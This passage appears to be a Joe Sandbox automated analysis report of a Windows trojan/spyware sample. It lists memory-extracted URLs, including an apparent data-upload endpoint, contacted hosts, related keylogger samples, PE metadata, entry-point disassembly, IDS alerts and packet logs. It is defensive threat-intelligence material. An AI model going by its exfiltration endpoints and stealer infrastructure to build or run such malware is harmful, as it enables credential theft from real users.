https://chrome.google.com/webstore?hl=enl	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002768000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/l	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002799000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002763000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.0000000002668000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.000000000263E000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000026AE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	YDg44STseR.exe, 00000000.00000002.2677264082.000000000263E000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
66.29.146.57	mail.besemglda.com	United States	19538	ADVANTAGECOMUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588582
Start date and time:	2025-01-11 02:41:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YDg44STseR.exe renamed because original name is a hash value
Original Sample Name:	c05ab375243499db0c1d595a6a7f4249e9831fb6b369ca1706aabac5b60a27a8.exe
Detection:	MAL
Classification:	mal100.troj.spyw.winEXE@1/0@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 171 Number of non-executed functions: 128
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:42:14	API Interceptor	2720598x Sleep call for process: YDg44STseR.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse
104.21.112.1	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
193.122.130.0	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
api.telegram.org	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ADVANTAGECOMUS	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	66.29.132.194
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	66.29.153.55
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
TELEGRAMRU	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
ORACLE-BMC-31898US	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	192.29.202.93
CLOUDFLARENETUS	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	104.21.15.100
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	ukBQ4ch2nE.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ukBQ4ch2nE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	J4CcLMNm55.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	J4CcLMNm55.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.30929688499345
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	YDg44STseR.exe
File size:	208'384 bytes
MD5:	7455fa9cb790aba2a0b149337cd0629a
SHA1:	e7217859b464420f73bf0b16df32f5c5f2207a60
SHA256:	c05ab375243499db0c1d595a6a7f4249e9831fb6b369ca1706aabac5b60a27a8
SHA512:	06dfd47a1dbe3b32ffce3b5a882d45ee768971d3e9b478a35f28e043fbf1f41672b5ff94c712fbb8ad95809be641eb20443281b1ab139a9e51bd8d78b6562012
SSDEEP:	6144:iDKW1Lgbdl0TBBvjc/Cy5lTREoWbBAqb9:kh1Lk70Tnvjc6gGTz9
TLSH:	5214BE1075D0C2B3C4B7117144E6CB7A9A397132476A92D7B6DD1BBA6F203E0A3362CE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~...................f....PE..L...t..P..........#........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40cd2f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	bf5a4aa99e5b160f8521cadd6bfe73b8

Entrypoint Preview

Instruction
call 00007F0065448BA6h
jmp 00007F0065442D69h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0041F058h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F0065442ECEh
test byte ptr [eax], 00000008h
je 00007F0065442EC9h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0041B000h]
leave
retn 0008h
ret
mov eax, 00413563h
mov dword ptr [004228E4h], eax
mov dword ptr [004228E8h], 00412C4Ah
mov dword ptr [004228ECh], 00412BFEh
mov dword ptr [004228F0h], 00412C37h
mov dword ptr [004228F4h], 00412BA0h
mov dword ptr [004228F8h], eax
mov dword ptr [004228FCh], 004134DBh
mov dword ptr [00422900h], 00412BBCh
mov dword ptr [00422904h], 00412B1Eh
mov dword ptr [00422908h], 00412AABh
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F0065442E5Bh
call 00007F00654496E0h
cmp dword ptr [ebp+00h], 00000000h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x215b4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26000	0x10cec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1b1c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x20da0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1b000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x19718	0x19800	4a9fb5db792c73b8c96c7cabe69056c4	False	0.5789388020833334	data	6.748523309740097	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1b000	0x6db4	0x6e00	5826801f33fc1b607aa8e942aa92e9fa	False	0.5467329545454546	data	6.442956247632331	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x22000	0x30c0	0x1600	2fe51a72ede820cd7cf55a77ba59b1f4	False	0.3126775568181818	data	3.2625868398009703	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26000	0x10cec	0x10e00	841f157d11b9fb6ba62d6e1ac0d6747a	False	0.9648726851851852	data	7.970519972931717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x26124	0xfc30	data	1.0004027261462205
RT_RCDATA	0x35d54	0x20	data	1.28125
RT_VERSION	0x35d74	0x31c	data	0.4271356783919598
RT_MANIFEST	0x36090	0xc5b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.3926651912741069

Imports

DLL	Import
KERNEL32.dll	RaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
ole32.dll	OleInitialize
OLEAUT32.dll	SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T02:42:13.881941+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49705	193.122.130.0	80	TCP
2025-01-11T02:42:15.272595+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49705	193.122.130.0	80	TCP
2025-01-11T02:42:15.827765+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49707	104.21.112.1	443	TCP
2025-01-11T02:42:16.694444+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49708	193.122.130.0	80	TCP
2025-01-11T02:42:17.293624+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49709	104.21.112.1	443	TCP
2025-01-11T02:42:19.827326+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49710	193.122.130.0	80	TCP
2025-01-11T02:42:20.460225+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49711	193.122.130.0	80	TCP
2025-01-11T02:42:23.460063+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49713	193.122.130.0	80	TCP
2025-01-11T02:42:25.725818+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49715	193.122.130.0	80	TCP
2025-01-11T02:42:28.670623+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49720	104.21.112.1	443	TCP
2025-01-11T02:42:31.408440+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.8	49725	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:42:11.351277113 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:11.356225014 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:11.356303930 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:11.356806040 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:11.361618042 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:12.706470013 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:12.715895891 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:12.720688105 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:13.835150003 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:13.881941080 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:14.289005041 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:14.289046049 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:14.289104939 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:14.347023964 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:14.347055912 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:14.821048021 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:14.821125984 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:14.834889889 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:14.834913015 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:14.835299015 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:14.881937027 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:14.983963013 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.027332067 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.100439072 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.100502968 CET	443	49706	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.100786924 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.110306025 CET	49706	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.117017031 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:15.121822119 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:15.223807096 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:15.227045059 CET	49707	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.227093935 CET	443	49707	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.227179050 CET	49707	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.227716923 CET	49707	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.227754116 CET	443	49707	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.272594929 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:15.685508013 CET	443	49707	104.21.112.1	192.168.2.8
